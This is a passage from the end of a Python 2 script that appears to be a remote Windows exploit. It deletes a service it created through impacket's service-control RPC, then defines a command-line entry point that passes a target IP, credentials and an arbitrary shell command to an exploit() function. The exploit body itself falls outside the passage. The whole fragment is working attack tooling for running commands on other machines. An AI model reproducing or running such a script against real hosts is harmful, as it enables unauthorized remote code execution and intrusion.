939 | 			print('Removing service %s.....' % service_name)
940 | 			scmr.hRDeleteService(rpcsvc, serviceHandle)
941 | 			scmr.hRCloseServiceHandle(rpcsvc, serviceHandle)
942 | 	except Exception, e:
943 | 		print("ServiceExec Error on: %s" % conn.get_remote_host())
944 | 		print(str(e))
945 | 	finally:
946 | 		if svcHandle:
947 | 			try:
948 | 				scmr.hRCloseServiceHandle(rpcsvc, svcHandle)
949 | 			except:
950 | 				print(str(e))
951 | 
952 | 	rpcsvc.disconnect()
953 | 
954 | if len(sys.argv) < 5:
955 | 	print("{} <ip> <username> <password> \"<shell_command>\"".format(sys.argv[0]))
956 | 	sys.exit(1)
957 | 
958 | 
959 | target = sys.argv[1]
960 | username = sys.argv[2]
961 | password = sys.argv[3]
962 | cmd = sys.argv[4]
963 | pipe_name = None
964 | 
965 | exploit(target, pipe_name, username, password, cmd)
966 | print('Done')
967 | 


--------------------------------------------------------------------------------